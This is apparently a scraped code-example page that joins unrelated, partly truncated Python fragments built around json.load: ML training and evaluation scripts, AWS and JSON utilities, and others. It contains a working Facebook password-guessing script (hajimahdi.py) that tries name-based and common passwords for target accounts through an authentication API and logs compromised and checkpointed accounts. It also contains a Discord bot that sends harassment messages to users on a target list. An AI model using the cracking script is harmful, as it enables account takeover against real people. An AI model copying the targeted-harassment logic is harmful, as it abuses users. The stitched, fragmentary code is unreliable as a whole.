                net_io_names['mito']: ArrayKeys.PRED_DIST_MITO,
                net_io_names['mito_mem']: ArrayKeys.PRED_DIST_MITO_MEM,
                net_io_names['lysosome']: ArrayKeys.PRED_DIST_LYSOSOME,
                net_io_names['lysosome_mem']: ArrayKeys.PRED_DIST_LYSOSOME_MEM,
            },
            gradients={}
        ) +
        Snapshot({
                ArrayKeys.RAW:                   'volumes/raw',
                ArrayKeys.GT_LABELS:         'volumes/labels/gt_labels',

                ArrayKeys.GT_DIST_CENTROSOME:    'volumes/labels/gt_dist_centrosome',
                ArrayKeys.PRED_DIST_CENTROSOME:  'volumes/labels/pred_dist_centrosome',

                ArrayKeys.GT_DIST_GOLGI:    'volumes/labels/gt_dist_golgi',
                ArrayKeys.PRED_DIST_GOLGI:  'volumes/labels/pred_dist_golgi',

                ArrayKeys.GT_DIST_GOLGI_MEM:    'volumes/labels/gt_dist_golgi_mem',
                ArrayKeys.PRED_DIST_GOLGI_MEM:  'volumes/labels/pred_dist_golgi_mem',

                ArrayKeys.GT_DIST_ER:    'volumes/labels/gt_dist_er',
                ArrayKeys.PRED_DIST_ER:  'volumes/labels/pred_dist_er',

                ArrayKeys.GT_DIST_ER_MEM:    'volumes/labels/gt_dist_er_mem',
                ArrayKeys.PRED_DIST_ER_MEM:  'volumes/labels/pred_dist_er_mem',

                ArrayKeys.GT_DIST_MVB:    'volumes/labels/gt_dist_mvb',
                ArrayKeys.PRED_DIST_MVB:  'volumes/labels/pred_dist_mvb',

                ArrayKeys.GT_DIST_MVB_MEM:    'volumes/labels/gt_dist_mvb_mem',
                ArrayKeys.PRED_DIST_MVB_MEM:  'volumes/labels/pred_dist_mvb_mem',

                ArrayKeys.GT_DIST_MITO:    'volumes/labels/gt_dist_mito',
                ArrayKeys.PRED_DIST_MITO:  'volumes/labels/pred_dist_mito',

                ArrayKeys.GT_DIST_MITO_MEM:    'volumes/labels/gt_dist_mito_mem',
                ArrayKeys.PRED_DIST_MITO_MEM:  'volumes/labels/pred_dist_mito_mem',

                ArrayKeys.GT_DIST_LYSOSOME:    'volumes/labels/gt_dist_lysosome',
                ArrayKeys.PRED_DIST_LYSOSOME:  'volumes/labels/pred_dist_lysosome',

                ArrayKeys.GT_DIST_LYSOSOME_MEM:    'volumes/labels/gt_dist_lysosome_mem',
                ArrayKeys.PRED_DIST_LYSOSOME_MEM:  'volumes/labels/pred_dist_lysosome_mem',

            },
            every=500,
            output_filename='batch_{iteration}.hdf',
            output_dir='snapshots/',
            additional_request=snapshot_request) +

        PrintProfilingStats(every=50))


    print("Starting training...")
    with build(train_pipeline) as b:
        for i in range(max_iteration):
            b.request_batch(request)

    print("Training finished")
コード例 #36
0
import json

with open('./crossword.json') as f:
    data = json.load(f)

squares = data["squares"]

for square in squares:
    square["isPencil"] = False

with open('crossword_parsed.json', 'w') as json_f:
    json.dump(data, json_f)

# import json
# import copy

# def nonesorter(square):
# 	if not square["down"]["puzzleIndex"]:
# 		return (256, square["squareIndex"])
# 	return (square["down"]["puzzleIndex"], square["squareIndex"])

# with open('./crossword.json') as f:
# 	data = json.load(f)

# squares = data["squares"]
# currSquareIndex = 0
# currPuzzleIndex = 1

# vertical_order = sorted(squares, key=nonesorter)

# with open('crossword_sorted.json', 'w') as json_f:
コード例 #37
0

import jk_tokenizingparsing

import json






FILE_PATH = "tokenize_json.json"


textConverterMgr = jk_tokenizingparsing.TextConverterManager()
textConverterMgr.register(jk_tokenizingparsing.Convert4HexToUnicode())

with open(FILE_PATH, "r") as f:
	tokenizer = jk_tokenizingparsing.fromJSON(textConverterMgr, json.load(f))





for t in tokenizer.tokenize("{'a':123}"):
	print(t)




コード例 #38
0
#!/usr/bin/python3

import json
import boto3
import sys


with open('/opt/aws_panel/parameters.json', 'r') as json_data:
     params = json.load(json_data)

ins_details = []
instance    = {}

access_id   = params.get('access_token').strip()
secret_key  = params.get('secret_token').strip()
#aws_region  = params.get('aws_region_name').strip()
# print (sys.argv[1])
aws_region  = sys.argv[1]


ec2client   = boto3.client('ec2',
                  aws_access_key_id=access_id,
                  aws_secret_access_key=secret_key,
                  region_name=aws_region,)

response    = ec2client.describe_instances()

for instance_data in response["Reservations"]:
    volumes                              =  []
    instance                             =  {}
    if instance_data.get('Instances')[0].get('State').get('Name') == 'terminated':
コード例 #39
0
def run_maximize(rep=1, flipperc=0, arch='alexnet', dataset='cifar10', scheme=1,
                 loadpath='', passport_config=''):
    epochs = 100
    batch_size = 64
    nclass = 100 if dataset == 'cifar100' else 10
    inchan = 3
    lr = 0.01
    device = torch.device('cuda')

    trainloader, valloader = prepare_dataset({'transfer_learning': False,
                                              'dataset': dataset,
                                              'tl_dataset': '',
                                              'batch_size': batch_size})

    passport_kwargs = construct_passport_kwargs_from_dict({'passport_config': json.load(open(passport_config)),
                                                           'norm_type': 'bn',
                                                           'sl_ratio': 0.1,
                                                           'key_type': 'shuffle'})

    if scheme == 1:
        model = AlexNetPassport(inchan, nclass, passport_kwargs)
    elif scheme == 2:
        model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs)
    else:
        model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs)

    sd = torch.load(loadpath)
    model.load_state_dict(sd, strict=False)

    for fidx in [0, 2]:
        model.features[fidx].bn.weight.data.copy_(sd[f'features.{fidx}.scale'])
        model.features[fidx].bn.bias.data.copy_(sd[f'features.{fidx}.bias'])

    for param in model.parameters():
        param.requires_grad_(False)

    passblocks = []
    origpassport = []
    fakepassport = []

    for m in model.modules():
        if isinstance(m, PassportBlock) or isinstance(m, PassportPrivateBlock):
            passblocks.append(m)

            if scheme == 1:
                keyname = 'key'
                skeyname = 'skey'
            else:
                keyname = 'key_private'
                skeyname = 'skey_private'

            key, skey = m.__getattr__(keyname).data.clone(), m.__getattr__(skeyname).data.clone()
            origpassport.append(key.to(device))
            origpassport.append(skey.to(device))

            m.__delattr__(keyname)
            m.__delattr__(skeyname)

            m.register_parameter(keyname, nn.Parameter(key.clone() + torch.randn(*key.size()) * 0.001))
            m.register_parameter(skeyname, nn.Parameter(skey.clone() + torch.randn(*skey.size()) * 0.001))
            fakepassport.append(m.__getattr__(keyname))
            fakepassport.append(m.__getattr__(skeyname))

    if flipperc != 0:
        print(f'Reverse {flipperc * 100:.2f}% of binary signature')
        for m in passblocks:
            mflip = flipperc
            if scheme == 1:
                oldb = m.sign_loss.b
            else:
                oldb = m.sign_loss_private.b
            newb = oldb.clone()

            npidx = np.arange(len(oldb))
            randsize = int(oldb.view(-1).size(0) * mflip)
            randomidx = np.random.choice(npidx, randsize, replace=False)

            newb[randomidx] = oldb[randomidx] * -1  # reverse bit
            if scheme == 1:
                m.sign_loss.set_b(newb)
            else:
                m.sign_loss_private.set_b(newb)

    model.to(device)

    optimizer = torch.optim.SGD(fakepassport,
                                lr=lr,
                                momentum=0.9,
                                weight_decay=0.0005)
    # scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
    #                                                  [int(epochs * 0.5), int(epochs * 0.75)],
    #                                                  0.1)
    scheduler = None
    criterion = nn.CrossEntropyLoss()

    history = []

    os.makedirs('logs/passport_attack_3', exist_ok=True)

    def run_cs():
        cs = []

        for d1, d2 in zip(origpassport, fakepassport):
            d1 = d1.view(d1.size(0), -1)
            d2 = d2.view(d2.size(0), -1)

            cs.append(F.cosine_similarity(d1, d2).item())

        return cs

    print('Before training')
    res = {}
    valres = test(model, criterion, valloader, device, scheme)
    for key in valres: res[f'valid_{key}'] = valres[key]
    with torch.no_grad():
        cs = run_cs()

        mseloss = 0
        for l, r in zip(origpassport, fakepassport):
            mse = F.mse_loss(l, r)
            mseloss += mse.item()
        mseloss /= len(origpassport)

    print(f'MSE of Real and Maximize passport: {mseloss:.4f}')
    print(f'Cosine Similarity of Real and Maximize passport: {sum(cs) / len(origpassport):.4f}')
    print()

    res['epoch'] = 0
    res['cosine_similarity'] = cs
    res['flipperc'] = flipperc
    res['train_mseloss'] = mseloss

    history.append(res)

    torch.save({'origpassport': origpassport,
                'fakepassport': fakepassport,
                'state_dict': model.state_dict()},
               f'logs/passport_attack_3_epochs/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e0.pth')

    for ep in range(1, epochs + 1):
        if scheduler is not None:
            scheduler.step()

        print(f'Learning rate: {optimizer.param_groups[0]["lr"]}')
        print(f'Epoch {ep:3d}:')
        print('Training')
        trainres = train_maximize(origpassport, fakepassport, model, optimizer, criterion, trainloader, device, scheme)

        print('Testing')
        valres = test(model, criterion, valloader, device, scheme)

        res = {}

        for key in trainres: res[f'train_{key}'] = trainres[key]
        for key in valres: res[f'valid_{key}'] = valres[key]
        res['epoch'] = ep
        res['flipperc'] = flipperc

        with torch.no_grad():
            cs = run_cs()
            res['cosine_similarity'] = cs

        print(f'Cosine Similarity of Real and Maximize passport: '
              f'{sum(cs) / len(origpassport):.4f}')
        print()

        history.append(res)

        torch.save({'origpassport': origpassport,
                    'fakepassport': fakepassport,
                    'state_dict': model.state_dict()},
                   f'logs/passport_attack_3/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e{ep}.pth')

    histdf = pd.DataFrame(history)
    histdf.to_csv(f'logs/passport_attack_3/{arch}-{scheme}-history-{dataset}-{rep}-{flipperc:.1f}.csv')
コード例 #40
0
ファイル: dx.py プロジェクト: ruchim/pytest-wdl
    def run_workflow(
        self,
        wdl_path: Path,
        inputs: Optional[dict] = None,
        expected: Optional[dict] = None,
        **kwargs
    ) -> dict:
        # TODO: handle "task_name" kwarg - run app instead of workflow
        wdl_doc = parse_wdl(wdl_path, self._import_dirs, **kwargs)

        if not wdl_doc.workflow:
            raise ValueError(
                "Currently, the dxWDL executor only supports executing "
                "workflows, not individual tasks"
            )

        workflow_name = wdl_doc.workflow.name

        if (
            "workflow_name" in kwargs
            and workflow_name != kwargs["workflow-name"]
        ):
            raise ValueError(
                f"The workflow name '{workflow_name}' does not match the value "
                f"of the 'workflow_name' parameter '{kwargs['workflow-name']}'"
            )

        namespace = kwargs.get("stage_id", "stage-common")
        inputs_dict = None

        if "inputs_file" in kwargs:
            inputs_file = ensure_path(kwargs["inputs_file"])

            if inputs_file.exists():
                with open(inputs_file, "rt") as inp:
                    inputs_dict = json.load(inp)

        if not inputs_dict:
            workflow_inputs = wdl_doc.workflow.available_inputs

            if workflow_inputs:
                dx_inputs_formatter = DxInputsFormatter(wdl_doc, **kwargs)
                inputs_dict = dx_inputs_formatter.format_inputs(inputs, namespace)
            else:
                inputs_dict = {}

        try:
            with login():
                workflow = self._resolve_workflow(wdl_path, workflow_name, kwargs)
                analysis = workflow.run(inputs_dict)

                try:
                    analysis.wait_on_done()

                    outputs = self._get_analysis_outputs(analysis, expected.keys())

                    if expected:
                        self._validate_outputs(outputs, expected, OUTPUT_STAGE)

                    return outputs
                except dxpy.exceptions.DXJobFailureError:
                    raise ExecutionFailedError(
                        "dxWDL",
                        workflow_name,
                        analysis.describe()["state"],
                        inputs_dict,
                        **self._get_failed_task(analysis)
                    )
                finally:
                    if self._cleanup_cache:
                        shutil.rmtree(self._dxwdl_cache_dir)
        except dxpy.exceptions.InvalidAuthentication as ierr:
            raise ExecutorError("dxwdl", "Invalid DNAnexus credentials/token") from ierr
        except dxpy.exceptions.ResourceNotFound as rerr:
            raise ExecutorError("dxwdl", "Required resource was not found") from rerr
        except dxpy.exceptions.PermissionDenied as perr:
            raise ExecutorError(
                "dxwdl", f"You must have at least CONTRIBUTE permission"
            ) from perr
def load_from_json_file(filename):
    """ creates an Object from a JSON file """
    with open(filename, 'r', encoding='utf8') as f:
        obj = json.load(f)
        return obj
コード例 #42
0
    sys.exit(1)

if len(sys.argv) < 2:
    print_usage()

url = sys.argv[1]
if not url.startswith('https://vgmdb.net/album/'):
    print_usage()
album_id = int(url[len('https://vgmdb.net/album/'):])

#TODO Using this json api seems to exclude certain scans.
# In particular, it normally excludes all booklet pages, Obi, and Tray.
# Consider scraping HTML instead to actually get every scan.
jso_url = 'https://vgmdb.info/album/%d?format=json' % album_id
req = urllib.request.urlopen(jso_url)
jso = json.load(req)
print(jso['name'])

track_languages = set()
tracks = []
max_track_digits = 2
disc_digits = math.ceil(math.log10(len(jso['discs'])))
multi_disc = len(jso['discs']) > 1
for disc in jso['discs']:
    max_track_digits = max(max_track_digits, math.ceil(math.log10(len(disc['tracks']))))
for disc_idx, disc in enumerate(jso['discs']):
    disc_num = str(disc_idx + 1).zfill(disc_digits)
    disc_track_digits = max(2, math.ceil(math.log10(len(disc['tracks']))))
    for track_idx, track in enumerate(disc['tracks']):
        track_num = str(track_idx + 1).zfill(disc_track_digits)
        track_languages |= track['names'].keys()
コード例 #43
0
def get_json(url):
    try:
        return json.load(urllib2.urlopen(url))
    except urllib2.HTTPError as e:
        print "Unable to fetch URL, exiting: %s" % url
        sys.exit(-1)
コード例 #44
0
ファイル: LedStripSetup.py プロジェクト: ITTech24/LedStrip
 def loadSettings(self):
     exist = os.path.isfile("settings.json")
     if exist:
         with open("settings.json") as f:
             data = json.load(f)
             self.redPin = data["redPin"]
コード例 #45
0
#by Lucas and Siddhant

import json
import csv
from pprint import pprint

with open('superheroes.json', 'r') as f:
    superheroes=json.load(f)

# Creates an empty an array called power
powers=[]

# Loop thorough the members of the squad, 
# Append the powers of each to the powers array.
members = superheroes ['members']

for hero in members:
	hero_powers= hero['powers']
	powers.append(hero_powers)

# Prints those powers to the terminal
pprint(powers)

with open('superheroes.csv', 'w') as f:
    writer = csv.writer(f)
    #writing the header
    writer.writerow(['name', 'age', 'secretIdentity', 'powers', 'squadName', 'homeTown', 'formed', 'secretBase', 'active'])
    members = superheroes ['members']
    for hero in members:
    	hero_name = hero['name']
    	hero_age = hero['age']
コード例 #46
0
def GetLinkfromElement(text, driver):
    return WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.LINK_TEXT, text))
    ).get_attribute('href')

def GetElementByXPATH(xpath, driver):
    return WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.XPATH, xpath))
    )

if __name__ == "__main__":
    # People to register
    try:
        registrants_json_file = "{}/registrants.json".format(dirname(abspath(__file__)))
        Registrants =  json.load(open(registrants_json_file))['registrants']
    except: 
        print(''' 
                Failed to load jummah_registrants.json file. Please make sure this the .json file exists to continue!
                #################################################################################
                # FOLLOW THE EXAMPLE BELOW FOR PESONAL INFO FORMAT in the registrants.json file
                # (only update the value of the attributes:
                # {
                #     "catagory": "men or women",
                #     "timeslot": "timeslot",
                #     "firstname": "firstname",
                #     "lastname": "lastname",
                #     "email": "email to get tickets",
                #     "phone": "0000000000"
                # }
                #################################################################################
コード例 #47
0
ファイル: hajimahdi.py プロジェクト: kingelyas2020/shahely
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass 
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b['first_name'] + '786'
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' 👽 ' + b['name']
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' 👽 ' + b['name']
					cek = open("out/CP.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = b['first_name'] + '123'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' 👽 ' + b['name']
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' 👽 ' + b['name']
							cek = open("out/CP.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						else:
							pass3 = b['first_name'] + '12345'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' 👽 ' + b['name']
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' 👽 ' + b['name']
									cek = open("out/CP.txt", "a")
									cek.write(user+"|"+pass3+"\n")
									cek.close()
									cekpoint.append(user+pass4)
								else:
									pass4 = b['first_name'] + '1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' 👽 ' + b['name']
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' 👽 ' + b['name']
											cek = open("out/CP.txt", "a")
											cek.write(user+"|"+pass4+"\n")
											cek.close()
											cekpoint.append(user+pass4)
										else:
											pass5 = '786786'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' 👽 ' + b['name']
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' 👽 ' + b['name']
													cek = open("out/CP.txt", "a")
													cek.write(user+"|"+pass5+"\n")
													cek.close()
													cekpoint.append(user+pass5)
												else:
													pass6 = b['last_name'] + '123'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' 👽 ' + b['name']
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' 👽 ' + b['name']
															cek = open("out/CP.txt", "a")
															cek.write(user+"|"+pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)
														else:
															pass7 = 'Pakistan'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' 👽 ' + b['name']
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' 👽 ' + b['name']
																	cek = open("out/CP.txt", "a")
																	cek.write(user+"|"+pass7+"\n")
																	cek.close()
																	cekpoint.append(user+pass7)
		except:																		
			pass
コード例 #48
0
    async def on_message(self, message):
        '''
        Bad words filtering
        Checks if every word contained in the message is in the list of 
        dirty words.
        If yes, then the bot delete the last message the sends a reminder
        as a response.
        '''
        if message.author.bot:
            return

        mentionUser = message.author.mention
        responseList = [
            f'{mentionUser} Please keep it clean bro',
            f'{mentionUser} Did your mom not raise you properly bro?',
            f'{mentionUser} I\'m calling the police on you bro'
        ]

        with open('txt/dirtywords.txt', 'r') as fp:
            dirtywords = fp.read().splitlines()

        for word in message.content.split():

            if word.lower() in dirtywords:
                await message.delete()
                await message.channel.send(responseList[randint(
                    0,
                    len(responseList) - 1)],
                                           delete_after=10)
        '''
        Checks if user who wrote a message is in the "people to harass"
        list. If yes, the bot will respond with a harassment message
        '''
        with open('txt/peopletoharass.txt', 'r') as fp:
            harassUserList = fp.read().splitlines()

        with open('txt/harassmentreponses.txt', 'r') as fp:
            harassmentResponses = fp.read().splitlines()

        if str(message.author) in harassUserList:
            try:
                randNum = randint(0, len(harassmentResponses) - 1)

                await message.channel.send(
                    f'{message.author.mention} {harassmentResponses[randNum]}')

                if randNum == 6:
                    sleep(5)
                    await message.channel.send(
                        f'{message.author.mention} Sike, b*tch')
                else:
                    pass

            except IndexError:
                print(
                    'Harassment response empty. Fill in the "harassmentreponses.txt"'
                )
        '''
        Level up system
        adds experience points every time a user sends a message
        in the server and assign them a level when they reach a
        certain experience point threshold
        '''
        try:
            with open('json/userxp.json') as fp:
                users = json.load(fp)

            users['users'][str(message.author.id)] += 1

            with open('json/userxp.json', 'w') as fileToDump:
                json.dump(users, fileToDump, indent=4)

            authorXP = users['users'][str(message.author.id)]

            if authorXP == 10:
                role = discord.utils.get(message.guild.roles,
                                         id=638181731794681866)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 30:
                role = discord.utils.get(message.guild.roles,
                                         id=638181995909873694)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 90:
                role = discord.utils.get(message.guild.roles,
                                         id=638182182136840202)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 270:
                role = discord.utils.get(message.guild.roles,
                                         id=638182260264403024)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 810:
                role = discord.utils.get(message.guild.roles,
                                         id=638182302408769571)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))

        except:
            pass
        '''
        This block of code sends a motivational message 
        to encourage you to get a girlfriend/boyfriend 
        if the bot receives a Direct Message from anyone.
        '''
        if message.channel.type == discord.ChannelType.private:
            DMresponses = [
                'Get a girlfriend bro (or boyfriend).', 'I have a boyfriend',
                'I\'m already committed to someone. Find someone else.'
            ]
            await message.author.send(DMresponses[randint(
                0,
                len(DMresponses) - 1)])
            return
        else:
            pass
        '''
        Logs all the messages sent.
        '''
        log = f'{message.channel}: ({self.currentTime}) {message.author}: {message.content}'
        print(log)
        with open(f'logs/{self.currentDate}.txt', 'a') as fpAppend:
            fpAppend.write(f'{log}\n')
コード例 #49
0
ファイル: streamer.py プロジェクト: jpa99/TwitterBotProject
def load_directory():
    # directory will be the first entry
    with open(TwitterBotProjectPath + '/config.json') as json_data_file:
        data = json.load(json_data_file)
        return data
コード例 #50
0
def main():
  usage = 'usage: %prog [options] <params_file> <model_file> <data_dir>'
  parser = OptionParser(usage)
  parser.add_option('-o', dest='out_dir',
      default='test_out',
      help='Output directory for test statistics [Default: %default]')
  parser.add_option('--rc', dest='rc',
      default=False, action='store_true',
      help='Average the fwd and rc predictions [Default: %default]')
  parser.add_option('--save', dest='save',
      default=False, action='store_true',
      help='Save targets and predictions numpy arrays [Default: %default]')
  parser.add_option('--shifts', dest='shifts',
      default='0',
      help='Ensemble prediction shifts [Default: %default]')
  parser.add_option('-t', dest='targets_file',
      default=None, type='str',
      help='File specifying target indexes and labels in table format')
  parser.add_option('--split', dest='split_label',
      default='test',
      help='Dataset split label for eg TFR pattern [Default: %default]')
  parser.add_option('--tfr', dest='tfr_pattern',
      default=None,
      help='TFR pattern string appended to data_dir/tfrecords for subsetting [Default: %default]')
  parser.add_option('-v', dest='high_var_pct',
      default=1.0, type='float',
      help='Highly variable site proportion to take [Default: %default]')
  (options, args) = parser.parse_args()

  if len(args) != 3:
    parser.error('Must provide parameters, model, and test data HDF5')
  else:
    params_file = args[0]
    model_file = args[1]
    data_dir = args[2]

  if not os.path.isdir(options.out_dir):
    os.mkdir(options.out_dir)

  # parse shifts to integers
  options.shifts = [int(shift) for shift in options.shifts.split(',')]

  #######################################################
  # targets

  # read table
  if options.targets_file is None:
    options.targets_file = '%s/targets.txt' % data_dir
  targets_df = pd.read_csv(options.targets_file, index_col=0, sep='\t')
  num_targets = targets_df.shape[0]

  # classify
  target_classes = []
  for ti in range(num_targets):
    description = targets_df.iloc[ti].description
    if description.find(':') == -1:
      tc = '*'
    else:
      desc_split = description.split(':')
      if desc_split[0] == 'CHIP':
        tc = '/'.join(desc_split[:2])
      else:
        tc = desc_split[0]
    target_classes.append(tc)
  targets_df['class'] = target_classes
  target_classes = sorted(set(target_classes))
  print(target_classes)

  #######################################################
  # model

  # read parameters
  with open(params_file) as params_open:
    params = json.load(params_open)
  params_model = params['model']
  params_train = params['train']

  # construct eval data
  eval_data = dataset.SeqDataset(data_dir,
    split_label=options.split_label,
    batch_size=params_train['batch_size'],
    mode=tf.estimator.ModeKeys.EVAL,
    tfr_pattern=options.tfr_pattern)

  # initialize model
  seqnn_model = seqnn.SeqNN(params_model)
  seqnn_model.restore(model_file)
  seqnn_model.build_ensemble(options.rc, options.shifts)

  #######################################################
  # targets/predictions

  # option to read from disk?

  # predict
  eval_preds = seqnn_model.predict(eval_data, verbose=1).astype('float16')
  print('')
  
  # targets
  eval_targets = eval_data.numpy(return_inputs=False, return_outputs=True)

  # flatten
  eval_preds = np.reshape(eval_preds, (-1,num_targets))
  eval_targets = np.reshape(eval_targets, (-1,num_targets))

  #######################################################
  # process classes

  targets_spec = np.zeros(num_targets)

  for tc in target_classes:
    class_mask = np.array(targets_df['class'] == tc)
    num_targets_class = class_mask.sum()

    if num_targets_class == 1:
      targets_spec[class_mask] = np.nan
    else:
      # slice class
      eval_preds_class = eval_preds[:,class_mask].astype('float32')
      eval_targets_class = eval_targets[:,class_mask].astype('float32')

      # highly variable filter
      if options.high_var_pct < 1:
        eval_targets_var = eval_targets_class.var(axis=1)
        high_var_t = np.percentile(eval_targets_var, 100*(1-options.high_var_pct))
        high_var_mask = (eval_targets_var >= high_var_t)

        eval_preds_class = eval_preds_class[high_var_mask]
        eval_targets_class = eval_targets_class[high_var_mask]

      # quantile normalize
      eval_preds_norm = quantile_normalize(eval_preds_class)
      eval_targets_norm = quantile_normalize(eval_targets_class)

      # mean normalize
      eval_preds_norm = eval_preds_norm - eval_preds_norm.mean(axis=-1, keepdims=True)
      eval_targets_norm = eval_targets_norm - eval_targets_norm.mean(axis=-1, keepdims=True)

      # compute correlations
      pearsonr_class = np.zeros(num_targets_class)
      for ti in range(num_targets_class):
        pearsonr_class[ti] = pearsonr(eval_preds_norm[:,ti], eval_targets_norm[:,ti])[0]

      # save
      targets_spec[class_mask] = pearsonr_class

      # print
      print('%-15s  %4d  %.4f' % (tc, num_targets_class, pearsonr_class[ti]))

  # write target-level statistics
  targets_acc_df = pd.DataFrame({
      'index': targets_df.index,
      'pearsonr': targets_spec,
      'identifier': targets_df.identifier,
      'description': targets_df.description
      })
  targets_acc_df.to_csv('%s/acc.txt'%options.out_dir, sep='\t',
                        index=False, float_format='%.5f')
コード例 #51
0
# This module tests to see APIs that relates to users works correctly or not
# NOTE: This test should not be used in production server
# (Due to generating random user in DB)
# TODO: Make test to be usable in production server
import json
import random
import string

# Load config file
with open('config.json', mode='r') as config_file:
    CONFIG = json.load(config_file)
HEADERS = {
    'Content-Type': 'application/json'
}
# Routes
USER_SIGNUP_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('signup')
USER_LOGIN_ROUTE = CONFIG.get('routes', {}).get('user', {}).get('login')
USER_PUBLICITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get(
    'publicity')
USER_ACTIVITY_ROUTE = CONFIG.get('routes', {}).get('user', {}).get(
    'activity_list')
LINKS_MAIN_ROUTE = CONFIG.get('routes', {}).get('links', {}).get('main')
CATEGORIES_MAIN_ROUTE = CONFIG.get(
    'routes', {}).get('categories', {}).get('main')
